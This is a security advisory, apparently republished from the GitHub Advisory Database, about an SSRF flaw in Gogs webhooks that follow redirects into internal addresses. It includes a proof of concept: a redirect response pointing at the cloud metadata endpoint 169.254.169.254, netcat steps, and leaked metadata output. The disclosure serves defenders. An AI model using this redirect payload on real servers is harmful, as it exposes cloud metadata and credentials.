【中危】Gogs has SSRF in webhook deliveries

安全速报 · 严重级:中危 · CVE-2026-47267 · GHSA-c4v7-xg93-qf8g

漏洞概要

Summary

The fix for CVE-2022-1285 prevents adding webooks or running webhooks with URLs with a hostname that resolves in localCIDRs. However, webhooks still follow redirects allowing to access hostname inside localCIDRs.

This was already communicated in the initial report but it looks like there was a bit of a miscommunication.

Details

By creating a webook pointing to any URL that will return the following:

HTTP/1.1 301 Moved Permanently
Location: http://169.254.169.254/metadata/v1.json
Content-Length: 0
Connection: close

It is possible to access 169.254.169.254

PoC

Run netcat on any server
Use this server as the webhook URL
Once you get the request from the webhook (for example by testing it), copy the response above

Results from running this on try.gogs:

{"droplet_id":456901166,"hostname":"gogs-do-nyc3-01","vendor_data":"Content-Type: multipart/mixed; boundary=\"===============8645434374073493512==\"\nMIME-Version: 1.0\n\n--===============8645434374073493512==\nMIME-Version: 1.0\nContent-Type: text/cloud-config; charset=\"us-ascii\"\nContent-Transfer-Encoding: 7bit\nContent-Disposition: attachment; filename=\"cloud-config\"\n\n#cloud-config\n\n# Enable root and password auth\ndisable_roo...{"dhcp_enabled":false,"vpc_peering_enabled":false},"dotty_status":"running","ssh_info":{"port":22}}

Impact

Server Side Request Forgery

Fix

The "simplest way" to fix it is most likely to leverage Client.CheckRedirect https://pkg.go.dev/net/http#hdr-Clients_and_Transports to check if the redirect is pointing to a blocked hostname

受影响组件

生态	组件	受影响版本	修复版本
go	`gogs.io/gogs`	<= 0.14.2	0.14.3

修复建议

升级 gogs.io/gogs 至 0.14.3 或更高版本。

参考链接

本文基于 GitHub Advisory Database(CC-BY-4.0 授权)整理,数据来源已注明。